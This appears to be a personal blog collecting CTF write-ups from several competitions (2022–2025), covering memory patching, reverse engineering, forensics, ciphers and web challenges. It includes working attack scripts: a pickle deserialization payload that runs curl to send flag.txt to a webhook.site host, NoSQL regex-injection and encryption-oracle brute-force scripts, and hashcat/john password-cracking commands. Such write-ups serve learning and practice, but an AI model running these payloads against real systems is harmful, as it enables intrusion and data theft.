Cramik

PicoCTF 2022 Wizardlike "Unique Solution"

2023-01-16T00:00:00+00:00

An arguably lazy solution to Wizardlike

Requirements:
Cheat Engine/Lunar Engine
ceserver for linux
Some decompiler

I'm lazy and cheat in videos games so my first intuition was to find the x and y coord values in lunar engine and set these to complete the challenges. You can do this by searching for an all type unknown value and re-searching for when you expect it to change (when you move) and when you don't expect it to change (standing still) to find the correct values. Doing this provides us with two 4 byte values at game+132F70 and game+132F74 (x, y).

However, after doing this and getting through the first couple of levels it becomes apparent that the ctf writer predicted this and made difficult to navigate levels with hidden objects to prevent this.

In order to find the hidden objects, you are expected to reverse the function for revealing hidden blocks. One way to do this is to start out by using Lunar Engine again to search for unknown value, this time being some block's visibility. I ended up finding a 4 byte value at game+136E4C.

Furthering this path, we can connect Lunar Engine's debugger via the "Find out what access this address" feature in order to find the instructions involved in revealing the block, 00402A0E for setting it to visible and 00401E82 for setting it to not visible.

From here, you can go to your decompiler in order to find the instruction at 00402A0E and the decompiled code for it. Doing this, we see that there is "else if" logic that checks whether the block is already visible and whether a function returns true. We can assume that this function likely is a check for visibility or choose to further read other parts of the code to discern the logic.

When we view the function, we can spot that there are only two sections where the function returns 0, making the block not visible. The instruction addresses for these two return values are 0000210A and 0000204A. We can go back to Lunar Engine, go to its Memory View, find the instruction using Ctrl+G and game+204A, and double click the instruction to patch it live with the value of 1.

Finally, we can check our work by moving around and find the entire map we are on is now visible. This allows us to go between the levels now and view the flag, picoCTF{ur_4_w1z4rd_8F4B04AE} (for an added bonus you can also find the 4 byte map value to avoid having to walk in-between levels)

CSAW CTF 2023

2023-09-15T00:00:00+00:00

Buckeye CTF 2023

2023-10-02T00:00:00+00:00

Stray #

I wrote down this was a javascript type pollution LFI

https://stray.chall.pwnoh.io/cat?category[]=../flag.txt

bctf{j4v45cr1p7_15_4_6r347_l4n6u463}

Electronical #

I did this one in three parts since my script was broken but still solved it. Even the official solution for this one said "solve script doesn't entirely work but mostly"

Script1 #

import string
import requests

zeros=11
payload="bctf"
while zeros!=0:
    goal=requests.get("https://electronical.chall.pwnoh.io/encrypt?message="+'0'*zeros).text[:32]
    print("Goal = ", goal)
    for char in string.printable:
        print('0'*zeros+payload+char)
        check=requests.get("https://electronical.chall.pwnoh.io/encrypt?message="+'0'*zeros+payload+char).text[:32]
        print("Check = ", check)
        if (check==goal):
            print("Correct")
            payload+=char
            zeros-=1
            break

Script2 #

import string
import requests

zeros=16
payload="bctf{1_c4n7_b3l"
while zeros!=0:
    goal=requests.get("https://electronical.chall.pwnoh.io/encrypt?message="+'0'*zeros).text[32:64]
    print("Goal = ", goal)
    for char in string.printable:
        print('0'*zeros+payload+char)
        check=requests.get("https://electronical.chall.pwnoh.io/encrypt?message="+'0'*zeros+payload+char).text[32:64]
        print("Check = ", check)
        if (check==goal):
            print("Correct")
            payload+=char
            break
    zeros-=1

Script3 #

import string
import requests

zeros=16
payload="bctf{1_c4n7_b3l13v3_u_f0und_my_"
while zeros!=0:
    goal=requests.get("https://electronical.chall.pwnoh.io/encrypt?message="+'0'*zeros).text[64:96]
    print("Goal = ", goal)
    for char in string.printable:
        print('0'*zeros+payload+char)
        check=requests.get("https://electronical.chall.pwnoh.io/encrypt?message="+'0'*zeros+payload+char).text[64:96]
        print("Check = ", check)
        if (check==goal):
            print("Correct")
            payload+=char
            break
    zeros-=1

Area51 #

Abusing NoSQL injection. See https://portswigger.net/web-security/nosql-injection

import requests
import string

success=len(requests.get("https://area51.chall.pwnoh.io/",cookies={"session":"{\"token\":{\"$regex\":\""+password+".*\"}}"}).content)
keyspace=string.ascii_letters+string.digits+"_"+"{"+"}"
password="bctf"
while(password[-1]!='}'):
     for char in keyspace:
             print(password+char)
             if(len(requests.get("https://area51.chall.pwnoh.io/",cookies={"session":"{\"token\":{\"$regex\":\""+password+char+".*\"}}"}).content)==success): 
                 password+=char
                 break

Text Adventure API #

Only slightly different from official solution. Save pickle is loaded on the server allowing RCE via python reduce

class test:
  def __reduce__(self):
             import subprocess
             return subprocess.check_output, (["curl","-d","@flag.txt","https://webhook.site/d5092a4a-c837-495e-b231-1511bcdaddae"],)
pickle.dump(test(),open('C:/Users/Cramik/Desktop/payload5.pkl','wb'))

CISA ICS CTF 2024

2024-09-01T00:00:00+00:00

Extend Your Stay - 1 #

crx files are chrome extensions that are basically just zip files. We can open it up, go to background.js and we'll see some code at the bottom:

// This will execute when the extension is first installed
chrome.runtime.onInstalled.addListener(() => {
    var val = "ZmxhZ3toeXAzcjN4dDNuZDNkfQ==";
    console.log("NO MORE RODENTS!!!!!!!!!!");
    console.log(atob(val));
});

val is a base64 encoded string that decodes to "flag{hyp3r3xt3nd3d}"

Extend Your Stay - 2 #

This part is included in the obfuscated part since it is malicious, we dont actually have to deobfuscate we can just start base64 decoding random base64 strings until we find aHR0cHM6Ly93d3cuZmVsbHN3YXJnby5jb20v == https://www.fellswargo.com/ which matches the challenge prompt

Mission: Inconceivable - 1 #

https://postalpro.usps.com/ppro-tools/encoder-decoder
DAFFFDDFTTFATDTDFFDTDAFADAATFATDTADTAFFDDTDTTADFDTTFDDAFAFFAFTATT
Chicago

Mission: Inconceivable - 2 #

"Using the information you know about the attackers, especially their culinary tastes, can you identify the BSSID (the access point's MAC address) for their hideout's WiFi network?"
8A:9C:67:46:08:B1
41.67711639,-107.9834137,Bringmetacosplease,0,20230701-00000,2023-07-01T14:00:00.000Z,2023-08-26T05:00:00.000Z,2023-08-26T05:00:00.000Z,8A:9C:67:46:08:B1,,infra,,2,0,?,?,?,False,11,,wpa2,US,WY,Carlton Road,,,

Read Askew Manuscripts - 1 #

volatility.exe printkey -f memdump_fewer_images_test1.raw -K Software\ACME_XRay
ZmxhZ3tmMzNsMW5nX3YwbEB0MWwzfQ==
flag{f33l1ng_v0l@t1l3}

Read Askew Manuscripts - 2 #

C:\Users\Cramik\Downloads\memdump.raw>volatility.exe notepad -f memdump_fewer_images_test1.raw
Volatility Foundation Volatility Framework 2.6
Process: 172
Text:
Dear friend,

Thank you for supporting this mission. Well, not like you really had a choice :)

Upload the patient's image using the link below. Do not upload any other patients. And do not get the wrong patient. I am out of patience.

https://www.ev1lf1lestorage.info/?directory=images&user=ominousnoteperson&passB64=aWxpa2V3cml0aW5nb21pbm91c25vdGVz&login=true

If necessary, you can use this flash drive to extract the image, but ONLY if the cloud storage doesn't work. And I know it works so don't pull any funny business.

Drop this flash drive at ///trips.pistons.huffs when you're done. If you see a man with an accordion, run.

See you never,

The Ominous Note Writer

P.S. If you get hungry on this mission, you're on your own. Bring a snack and just Eat It.

ilikewritingominousnotes

Read Askew Manuscripts - 3 #

C:\Users\Cramik\Downloads\memdump.raw>volatility.exe iehistory -f memdump_fewer_images_test1.raw
Volatility Foundation Volatility Framework 2.6

Process: 1588 explorer.exe
Cache type "DEST" at 0x21b1e2d
Last modified: 2024-04-11 11:42:52 UTC+0000
Last accessed: 2024-04-11 17:42:54 UTC+0000
URL: Administrator@file:///E:/Phoenix_Wright.png

Process: 1588 explorer.exe
Cache type "DEST" at 0x21cea1d
Last modified: 2024-04-11 11:42:52 UTC+0000
Last accessed: 2024-04-11 17:42:54 UTC+0000
URL: Administrator@file:///E:/Phoenix_Wright.png

Read Askew Manuscripts - 4 #

https://steemit.com/security/@nybble/forensic-extracting-files-from-mft-table-with-volatility-part-2-en

C:\Users\Cramik\Downloads\memdump.raw>volatility.exe filescan -f memdump_fewer_images_test1.raw | grep Phoenix
Volatility Foundation Volatility Framework 2.6
0x00000000096959b0 1 0 RW-rw- \Device\HarddiskVolume1\Documents and Settings\Administrator\Recent\Phoenix_Wright.lnk
0x0000000009769228 1 0 R--r-- \Device\DP(1)0-0+3\Phoenix_Wright.png
0x000000000978c820 1 0 R--r-- \Device\HarddiskVolume1\Documents and Settings\Administrator\Desktop\patient_images\Phoenix_Wright.png

C:\Users\Cramik\Downloads\memdump.raw>volatility.exe dumpfiles -Q 0x0000000009769228 -D files/ -u -n -f memdump_fewer_images_test1.raw
Volatility Foundation Volatility Framework 2.6
DataSectionObject 0x09769228 None \Device\DP(1)0-0+3\Phoenix_Wright.png

Follow the Charts - 3 #

The malicious application is a notes to bash converter. The main function for decoding is "decodechart." Reversing is an option, but would be hard considering the amount of xors, bitwise operations, and subfuctions. Instead, we can use a sandbox like app.any.run just to see what commands it runs and we'll see "sh -c "#flag{W31C0Me_t0_tH3_JUn6L3} echo "Finished updating clone hero charts :)"""

Introduction to Malcolm - 8 #

destination.port>60000 AND source.port>60000
include the network.community_id field on the left side

Introduction to Malcolm - 9 #

communityId=="1:lkHwtdagxh1Nv9QKO2SuVdVkQ0I="

Learning to DRIFT - 1 #

packet 6 PLC -> HMI NEW-CONNECTION-RESPONSE
000c = length
01 = message code (NEW-CONNECTION)
00 = respone code
61cb506b8ff1b477 = Partial AES

The first encrypted command sent by the HMI in this capture is a Read-Sensor command. What was the responded current-value of that sensor (sensor id is 100)?

packet 8 HMI -> PLC READ-SENSOR-REQUEST
001a = length
a9de4b26a71f6989 = partial aes key
6d21595f8c02ffad25b55ed49a4a3d8e

Create a cyberchef recipe:
AES_Decrypt({'option':'Hex','string':'61cb506b8ff1b477a9de4b26a71f6989'},{'option':'Hex','string':''},'ECB','Hex','Raw',{'option':'Hex','string':''},{'option':'Hex','string':''})
To_Hex('Space',0)

Decrypt 6d21595f8c02ffad25b55ed49a4a3d8e

Output:
03 - Message code (READ-SENSOR)
64 - Sensor ID

Packet 9 PLC -> HMI READ-SENSOR-RESPONSE
001a = length
9191c45d7fe2ddca = partial aes key
39f35ca00eb0ada6c29996f1bf9eb2e7

AES_Decrypt({'option':'Hex','string':'61cb506b8ff1b4779191c45d7fe2ddca'},{'option':'Hex','string':''},'ECB','Hex','Raw',{'option':'Hex','string':''},{'option':'Hex','string':''})
To_Hex('Space',0)
Decrypt 39f35ca00eb0ada6c29996f1bf9eb2e7

Output:
03 = message code
00 = response code
64 = sensor id
00 00 02 06 = value
0206 hex to decimal is 518

Bulk Recipe:
Drop_bytes(0,4,false)
Register('(^.{16})',true,false,false)
Drop_bytes(0,16,false)
AES_Decrypt({'option':'Hex','string':'9bc665880b5df8fc$R0'},{'option':'Hex','string':''},'ECB','Hex','Raw',{'option':'Hex','string':''},{'option':'Hex','string':''})
To_Hex('Space',0)

Sensor request: 001a0a6f538822259c7390a6e5d86712724891d7549593f8ff95
06 = message code
06 = count
64 65 66 67 68 69 = sensor ids

Sensor Response:
06 = message code
00 = response code
06 = sensor count
Sensor ranges:
64 00 00 01 e0 00 00 02 3a 00 00 01 c2 00 00 02 58 65 00 00 01 9a 00 00 01 ea 00 00 01 90 00 00 01 f4 66 00 00 00 41 00 00 00 4b 00 00 00 3c 00 00 00 50 67 00 00 00 41 00 00 00 4b 00 00 00 3c 00 00 00 50 68 00 00 00 41 00 00 00 4b 00 00 00 3c 00 00 00 50 69 00 00 00 41 00 00 00 4b 00 00 00 3c 00 00 00 50

Each sensor range is 17 bytes:
64000001e00000023a000001c200000258
650000019a000001ea00000190000001f4
66000000410000004b0000003c00000050
67000000410000004b0000003c00000050
68000000410000004b0000003c00000050
69000000410000004b0000003c00000050

Break up each sensor range to ID and ranges
64 = Sensor ID
000001e0 = WARNING-LOW
0000023a = WARNING-HIGH
000001c2 = ALERT-LOW
00000258 = ALERT-HIGH

Alarms (3rd TCP session):
001a8ddec2027f0172a440e2a3c789beff16e77009c9c5213c1f - GET-ALARM-REQUEST (0x07)

001a64314cb84d00addee6843f0381d1db25da6b2506dd76f524 - GET-ALARMS-RESPONSE

Decrypts to:
07 - Message code
00 - Response code
02 - Alarm Count
Alarm Data:
66 - Sensor ID
a0 - Alarm Code (WARNING: LOW)
0000003f - Value = 63

6b - Sensor ID
b1 - Alarm Code (ALERT: HIGH)
0000041a - Value = 1050

A Timely Attack #

import subprocess
import string
import time

# Base string to start with
test_string = ["0"]*8
best_char = ''
keyspace = string.digits+string.ascii_lowercase

for i in range(len(test_string)):
	max_time = -1
	second_best = -1
	best_char = ''
	
	for char in keyspace:
		test_string[i]=char
		
		start_time = time.time()

		for _ in range(1): subprocess.run(["./time_attack1", ''.join(test_string)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)

		elapsed_time = time.time() - start_time
		print(f"{char} - {elapsed_time}")
		if elapsed_time > max_time:
			second_best = max_time
			max_time = elapsed_time
			best_char = char
	test_string[i]=best_char
	print(f"Found {best_char} {(max_time/second_best-1)} Current best string: {''.join(test_string)}, elapsed time: {max_time}")

# Final string after all iterations
print(f"Final string: {test_string}")

flag{1t_0Nly_T@k3s_4_l3ttlE_T!mE}

DEADFACE CTF 2024

2024-10-18T00:00:00+00:00

It took me like 15 minutes to figure out what CTF these notes were for because I never labelled them and half of these challenges don't show up when you google them.

Something in the Dark #

Category: Steg
The challenge links an image of a tweet talking about flashing "RED GREEN BLUE" and another image. First instinct is using a tool like stegsolver to view the various planes (alpha, red, green, blue) both visually and as data. Going through each plan visually we can spot text on Red Plane 1 saying "flag{ar3_we_410N3??}"

Price Check #

Category: Steg
The challenge gives us a csv with a hint to "scan." Looking at the csv it is a 29x29 matrix of numbers from 0-255 (denoting a byte, and potentially a color if you get what I'm going with). These two things sound a lot like 29x29 node QR code. I don't believe there is any software to translate this file format and I don't have pillow memorized, so I decided to have chatgpt do it

See the following:
# CSV to Image Conversion

#### You:
I have a csv file denoting a 29x29 black and white image ie 255,255,0,255\n0,255... can you write a python script to convert it to an image

#### ChatGPT:
Sure! Below is a Python script that reads a CSV file representing a 29x29 black and white image and converts it into an image using the `Pillow` library. The assumption is that values in the CSV represent pixel intensities (0 for black, 255 for white):

\```python
import csv
from PIL import Image
import numpy as np

# Load the CSV file
csv_file = 'your_file.csv'  # Replace with your CSV file path
output_image = 'output_image.png'  # Replace with desired output image name

# Read the CSV file
with open(csv_file, newline='') as f:
    reader = csv.reader(f)
    data = list(reader)

# Convert the CSV data to a numpy array
image_data = np.array(data, dtype=np.uint8)

# Reshape into a 29x29 array
image_data = image_data.reshape((29, 29))

# Create an image from the numpy array
image = Image.fromarray(image_data)

# Save the image
image.save(output_image)
image.show()
\```

### Key Points:

- The script reads the CSV, converts it to a NumPy array, and reshapes it into a 29x29 grid.
- It assumes that the values are already in the form of pixel intensities (0 for black and 255 for white).
- You can replace the CSV file path with your actual file's name.

Let me know if you need any further customization!


This almost works perfectly, but needed to flip it in an image editor because the reshape was kind of weird. In the end we get "flag{that_will_be_five_dollars}"

Syncopated Beat #

Category: Steg

Challenge lists something about demon voices and includes a video, listen to video and you will hear reversed speech partway in the song, classic. Reversing audio in audacity gives us the voices (very good quality audio too)

The silly "demon" gives a hint that the flag is a band that did a song like "fly like an eagle, time keeps on slipping" in the 70s with all cap, spaces between the words (good song). The band is STEVE MILLER BAND

Logical Left and Rational Right #

Challenge is a file with a bunch of \ and /. Very binary looking

Used cyberchef

Find_/_Replace({'option':'Regex','string':'\\\\'},'0',true,false,true,false)
Find_/_Replace({'option':'Regex','string':'\\/'},'1',true,false,true,false)
From_Binary('Space',8)

Gives us "Just a little something to get started, hope you have fun this year Turbo Tacky!!!! flag{H3YY0UrF1N411Y4W4K3}"

Ides-le Talk #

Challenge is a txt file with text like "Gur Yvsr naq Qrngu bs Whyvhf Pnrfne." The patterns look a lot like a monoalphabetic substitution cipher, particularly a rotation so tested it versus rot13 in cyberchef and we get "The Life and Death of Julius Caesar.' Ctrl-F for "flag" and we find "flag: L3t_The#Mi$chiefs^8361n"

Similar challenge to Ides-le but this time ROT13 Bruteforcing didnt work example text: "Svb ororgs, yrt mvdh! Dv'iv tlrmt zugvi Wv Nlmmv Urmzmxrzo mvcg. Gsvri hvxfirgb nvzhfivh szev hlnv slovh gszg dv'iv tlmmz vckolrg yrt grnv! R'ev yvvm klprmt zilfmw zmw ulfmw hlnv HJO efomvizyrorgrvh dv xzm oveviztv uli nzcrnfn xszlh."

Since ROT13 didn't work I shoved it in dcode's monoalphabetic substitution cipher solver (https://www.dcode.fr/monoalphabetic-substitution). This gives us "HEY LILITH, BIG NEWS! WE'RE GOING AFTER DE MONNE FINANCIAL NEXT. THEIR SECURITY MEASURES HAVE SOME HOLES THAT WE'RE GONNA EXPLOIT BIG TIME! I'VE BEEN POKING AROUND AND FOUND SOME SQL VULNERABILITIES WE CAN LEVERAGE FOR MAXIMUM CHAOS." and two potential keys (ZYXWVUTSRAPONMLKJIHGFEDCBQ or JYXWVUTSRQPONMLKZIHGFEDCBA). Using these we can decrypt their chats and find that they are talking about "Elroy Ongaro" so the flag is "flag{Elroy_Ongaro}

Cereal Killer 01 #

Using IDA to decompile the windows code we get something like

  sub_791020("As in, which spooky cereal is best?\n", v27);
  sub_791020("Mr. Robert F. Kennedy, Jr. has a favorite spooky cereal.  Tear apart this\n", v28);
  sub_791020("binary and see if you can figure out what it is!\n", v29);
  sub_791020("\n\n", v30);
  sub_791020("Please enter the password: ", v31);
  sub_791060("%1023[^\n]", (char)Src);
  v8 = Src;
  for ( j = strlen(Src); isspace(ArgList[j + 47]); Src[j] = 0 )
    --j;
  for ( k = Src[0]; k; --j )
  {
    if ( !isspace(k) )
      break;
    k = *++v8;
  }
  memmove(Src, v8, j + 1);
  sub_7910A0(13);
  if ( !strncmp(Str1, "obboreel", 8u) )
  {
    v24 = "ACCESS DENIED!!!\n";
  }

so I tried "obboreel" as the password. That didn't work, so I did it again and looked to see what it was comparing for the strncmp. In this stack we could see "booberry" so I used that and it worked and spat out the flag

She's Got Issues #

"Head over to their code repo and see if you can gather some intel on the state of the develop team and other clues that might help you hack the Sweepstakes website."
Click repo, check issues tab, ctrl-f "flag", flag{CK06b-What-The-Director-Wants-The-Director-Gets!!!}

Image of the Beast #

Some sorta lore about a disgruntled employee, he left something for us in a repo. Link to a github. Click link to github, find image by the disgruntled employee, look at exif data "WebStatement https://schnickschnock.lyttonlabs.org/schnickschnock/welp.html" Flag at the bottom of page "flag{CK06a-Clippy-Isnt-Disgruntled-He-Was-Never-Gruntled-In-The-First-Place!!!}"

Cereal Killer 05 #

Use a java decompiler to decompile the code, notice it uses an incrementing xor cipher to decrypt the url with our supplied cipher and that the plaintext url starts with "https://'. Use the reversibility of xor with known plaintext as such:

encrypted_url=[42, 6, 68, 64, 7, 120, 93, 31, 83, 17, 48, 23, 81, 92, 90, 46, 11, 68, 68, 27, 44, 30, 81, 82, 7, 108, 29, 66, 87, 91, 33, 23, 66, 85, 21, 46, 1, 31, 86, 6, 45, 29, 68, 82, 6, 45, 29, 68, 30, 30, 50, 23, 87]
for i in range(len("https://")): print(chr(encrypted_url[i]^ord("https://"[i])),end='')

This gives us "Br00tBr0'
but we happen to know there is a modulus in the code so the key is reused, so we can assume the key is actually just "Br00t"

C:\Users\Cramik\Desktop>java -jar cerealkiller05.jar
President Donald Trump has a favorite cereal.  It is great... really great...
The reason it is so great, is because HE likes it... that makes it reall great...
Of course, to maintain utmost secrecy, it is protected with a password that is
HIGHLY secure (and backed up securely on a piece of paper somewhere in Mar Lago...)
Now, you, being a highly trained hacker, should be able to BYPASS this security and
discover what President Trump's favorite monster cereal is.

Enter password: Br00t
Decrypted URL: https://cereal.lyttonlabs.org/cereals/frootbroot.jpeg
Decrypted Flag: flag{Fr00t-Br00t-is-the-only-cereal-for-Prez-Trump!}

Cereal Killer 02 #

I played around with inputs and noticed that the access denied output is hit when a DWORD (labelled v9 by IDA) fails an if comparison with another DWORD (v11). I also noticed that v11 is independent of our input so its likely the intended result of our input. With this, I patched the assembly above that sets
"v9 = &v44;" to the equivalent of "v9 = &v45;" since v11 is set to &v45 right before the comparison
basically turned

.text:00FE1435 lea     ecx, [esp+760h+var_480]
.text:00FE143C mov     esi, 0Ch
.text:00FE1441 lea     edx, [esp+760h+var_470]

.text:00FE1435 lea     ecx, [esp+760h+var_470]
.text:00FE143C mov     esi, 0Ch
.text:00FE1441 lea     edx, [esp+760h+var_470]

Data Breach #

Downloaded the pcap file, pcapng so couldn't use networkminer free version :(. Sorted by protocol, skipped ARP, thought DNS looked suspicious but didnt see anything easy to solve, so went down to HTTP. Noticed an HTTP header "Not-Suppose-To-Be-Here: flag{Information_disclosure_in_the_head}"

(Future me here. You can just use wireshark to convert pcapng to pcap) #

Winning Factors #

from pwn import *
from math import factorial
a=remote("147.182.245.126","33001");b=a.recvline();print(b);number=b[27:-2];print(number);answer=str(math.factorial(int(number)));print(answer);a.send(answer);b=a.recvall(timeout=1);print(b)

Is This Vul-ner-ble? #

hashcat -m 16500 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsIm5vbmNlIjoiIn0.eyJpc3MiOiJ0dXJib3RhY3RpY2FsLm5ldCIsImV4cCI6IjE0NTA2NTkxMDIiLCJ1cG4iOiJjZm9kZXJhIiwiZnVsbF9uYW1lIjoiQ2xhaXIgRm9kZXJhIiwidXNlcm5hbWUiOiJDRm9kZXJhOTEiLCJwaG9uZV9udW1iZXIiOiIiLCJqdGkiOiJmdGlkMjM0MmEtMzI0M2QtMjM0My1kMzR5OHlnZmZlIiwic3R1ZmYiOjExMjIyLCJncm91cHMiOlsibG93X2FkbWluIiwicmVtb3RlX3VzZXIiLCJsYWJ0ZWNoIl0sIm9yZyI6IlR1cmJvVGFjdGljYWwiLCJzdWJfb3JnIjoiR3JvdXBfRCIsIm5idCI6NTc1NDczNzU0ODI5NTI3NTAwMDAsImxkZV9zIjpbeyJhc3RhdHVzIjoibnVsbCIsImJzdGF0dXMiOiJudWxsIiwiY3N0YXR1cyI6InZhbGlkIiwiZHN0YXR1cyI6Im51bGwifV19.kQKRFPLj_SqVeEiBjfKi7FKOEVoV71JgdFRxDTjp7TQ fasttrack.txt

LayerOne CTF 2025

2025-05-25T00:00:00+00:00

Out of Frame #

Binary Eye handles this one very easily

Flag Hunting #

Open in wireshark, sort by HTTP, see "flag.txt", copy text

Secret File 1 #

┌──(cramik㉿Android)-[/mnt/c/users/cramik/downloads]
└─$ pdf2john secret.pdf
secret.pdf:$pdf$5*6*256*-4*1*16*e43d2d0f128345ae81f6c688ecac2b35*48*89a68ba2b7c26dbcfe3f952e53c835a6f92bbf6840229620adacc247fb295302cddc27aaa02dd18245323ab714c349c5*48*50ac35ca7f0844156dec1333a5ec762749f3d5daf7c0e12f21beb36a715687e71a24aeba62041b0345f1f0449dbc9a8b*32*108ab1c0bb3c5d999b04eacee2469554e35a616eaaef72ac869a2e4f8a1ef6bb*32*6460f87b24048e8dcfbfa5d6e7e7becb01ae3c80784cb8c66102fb011a969255

C:\Users\Cramik\Desktop\SecTools\hashcat>hashcat -m 10700 secret.pdf.txt wordlists/rockyou.txt

$pdf$5*6*256*-4*1*16*e43d2d0f128345ae81f6c688ecac2b35*48*89a68ba2b7c26dbcfe3f952e53c835a6f92bbf6840229620adacc247fb295302cddc27aaa02dd18245323ab714c349c5*48*50ac35ca7f0844156dec1333a5ec762749f3d5daf7c0e12f21beb36a715687e71a24aeba62041b0345f1f0449dbc9a8b*32*108ab1c0bb3c5d999b04eacee2469554e35a616eaaef72ac869a2e4f8a1ef6bb*32*6460f87b24048e8dcfbfa5d6e7e7becb01ae3c80784cb8c66102fb011a969255:licenciada

Open pdf, use password, copy invisible text

Barbie's Cave Adventure #

The image has a cave with a dancing man cipher on the wall, dcode has a translator for this cipher https://www.dcode.fr/dancing-men-cipher

Piercing Secrets #

Upload image to aperisolve, aperisolve did steghide and found Daggers.png

Barbie's Mysterious Sound #

There's a small bit of morse code in the middle of the audio, extract it with audacity.
I had difficulties getting the normal "Morse Code Adaptive Audio Decoder" to work so I went with https://morsefm.com/

Examsploit #

Modify the correct count in the /api/submit_exam request

Echoes Of Gunaa #

AHA music chrome extension -> https://www.aha-music.com/7c53e604a07b928a0db65fcb437ef406?title=Kanmani Anbodu Kadhalan (From "Guna")&artist=Kamal Haasan%2FVaali%2FS. Janaki%2FIlaiyaraaja -> https://en.wikipedia.org/wiki/Kanmani_Anbodu_Kadhalan -> https://en.wikipedia.org/wiki/Guna_Caves -> flag{GunaCaves_10.21_77.46}

Operation Silent Web #

"Specter" "2216"
https://www.instagram.com/specter_._2216
"Shadows on Familiar Grounds"

https://www.instagram.com/p/DI7R3wyTHjA/
#PasswordHere

"To unlock the secrets hidden in plain sight, shift your focus 22 steps back from where 'A' begins. A simple code, but only for those who can decode the past.

dpplo://sss.hejgazej.yki/ej/olaypan-odwzkso-1833x1363?qpi_okqnya=odwna&qpi_ywilwecj=odwna_rew&qpi_ykjpajp=lnkbeha&qpi_iazeqi=wjznkez_wll"

https://cyberchef.io/#recipe=ROT13(true,true,false,-22)&input=ZHBwbG86Ly9zc3MuaGVqZ2F6ZWoueWtpL2VqL29sYXlwYW4tb2R3emtzby0xODMzeDEzNjM/cXBpX29rcW55YT1vZHduYSZxcGlfeXdpbHdlY2o9b2R3bmFfcmV3JnFwaV95a2pwYWpwPWxua2JlaGEmcXBpX2lhemVxaT13anpua2V6X3dsbA

https://www.linkedin.com/in/specter-shadows-1833b1363?utm_source=share&utm_campaign=share_via&utm_content=profile&utm_medium=android_app

https://cyberchef.io/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)&input=Wm14aFozdG9hV2xmYVcxZmMzQmxZM1JsY2w5dWFXTmxYM1J2WDIxbFpYUmZlVzkxWDJGc2JIMD0

Scan Me #

https://www.aperisolve.com/62600eead024bbf1bf4c547d8feee020 + Binary Eye

Locksmith #

https://github.com/joswr1ght/PatternLockScripts
python3 GenerateAndroidGestureRainbowTable.py
python GestureKeyLookup.py gesture.key
[2, 1, 4, 3, 0, 7, 8, 5, 6]
flag{214307856}

Barbie World Reversing #

Binary Breach #

Same thing?

Nexus #

Barbie's Secret Slip 1 #

https://github.com/chiccoder342 -> https://github.com/chiccoder342/fashionbytes only one with commits -> test branch -> commits -> https://github.com/chiccoder342/fashionbytes/commit/b2f5228fe54eb3505e1dd3fe6892e62bdfd67ab9 -> AUTH_SECRET

Barbie's Secret Slip 2 #

https://bsky.app/profile/chiccoder342.bsky.social/post/3lpwtyo52bt2s -> Base64 Decode
https://sites.google.com/view/chiccodersite234/project-page

Barbie's Secret Slip 3 #

https://web.archive.org/web/20241209164508/https://sites.google.com/view/chiccodersite234/project-page

Polyglots! Five #

There's VBScript in the code if you look hard enough. Copy that, and remove the if statement to print the flag
Final Code:

Dim a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,z1,z2,z3,z4,x1,x2
a=Chr(73):b=Chr(110):c=Chr(112):d=Chr(117):e=Chr(116):f=Chr(66):g=Chr(111):h=Chr(120)
x1=a&b&c&d&e&f&g&h:x2=Eval(x1&"(" & Chr(34)&"Sing to me:"&Chr(34)&")")
z1="illusion":z2=Mid(z1,3,2):z3=0:z4=0:If x2="karaoke" Then z3=z3+999:w=False
If Len(z1)=8 And z2="lu" And z3=z4+1 Then w=True
u=Array(79,98,125,102,119,88,112,107,70,85,74,124,120,58,112,60,98,110,55,96,57,104,55,54,113,55,99,110,58,113,118,58,128)
p=Array(3,1,4,1,5,9,2,6):v=""
For i=0 To UBound(u):v=v&Chr(u(i)-p(i Mod 8)):Next:MsgBox v
If Not w Then MsgBox Chr(78)&Chr(111)&Chr(112)&Chr(101)&Chr(33)&Chr(32)&Chr(84)&Chr(114)&Chr(121)&Chr(32)&Chr(108)&Chr(111)&Chr(117)&Chr(100)&Chr(101)&Chr(114)&Chr(46):End If

FixMe #

PCRT solves this one https://github.com/sherlly/PCRT
python2 PCRT.py -i "chall.png" -o "chall_out.png"
Y to autofixing, N to fixing IDAT chunk data length. Repaired image looks like this

Lawrence of Arabia #

5th Element #

C:\Users\Cramik\Desktop\asimov>stegolsb wavsteg -r -i DancingDiva2.wav -o output -n 2 -b 100000
Files read                     in 0.02s
Recovered 100000 bytes         in 0.01s
Written output file            in 0.00s

XMI #

# Extract.py
import xmi

# Open the XMI file
xmi_obj = xmi.open_file("ARCHIVE.DATA (1).XMI")

# List files/members within the XMI
for f in xmi_obj.get_files():
    if xmi_obj.is_pds(f):
        for m in xmi_obj.get_members(f):
            print(f"{f}({m})")
    else:
        print(f)

# Extract all contents to a folder
xmi_obj.set_output_folder(".")
xmi_obj.extract_all()

Open the extracted zip, put FLAG file into hxd and switch to EBCDIC encoding in HXD (at the top)

Secret File 2 #

┌──(cramik㉿Android)-[/mnt/c/users/cramik/downloads]
└─$ zip2john Confidential.zip
ver 2.0 efh 5455 efh 7875 Confidential.zip/VeryVeryConfidential.png PKZIP Encr: TS_chk, cmplen=28002, decmplen=32661, crc=8947A8FD ts=11BC cs=11bc type=8
ver 1.0 efh 5455 efh 7875 ** 2b ** Confidential.zip/protected.zip PKZIP Encr: TS_chk, cmplen=374345, decmplen=374333, crc=79E8FA33 ts=1294 cs=1294 type=0
Confidential.zip:$pkzip$2*1*1*0*0*24*1294*{a bunch of junk}*$/pkzip$::Confidential.zip:VeryVeryConfidential.png, protected.zip:Confidential.zip

┌──(cramik㉿Android)-[/mnt/c/users/cramik/Desktop/SecTools/hashcat]
└─$ john --mask=?a?a?a layerone.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
soc              (Confidential.zip)
1g 0:00:00:00 DONE (2025-05-25 12:27) 20.00g/s 2621Kp/s 2621Kc/s 2621KC/s +"2..ZBc
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

zip2john protected.zip > protected.txt

┌──(cramik㉿Android)-[/mnt/c/users/cramik/Desktop]
└─$ john -1=?l?u --mask=?1?1?1ARE?d?d?d  protected.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
catARE143        (protected.zip/Proof.png)
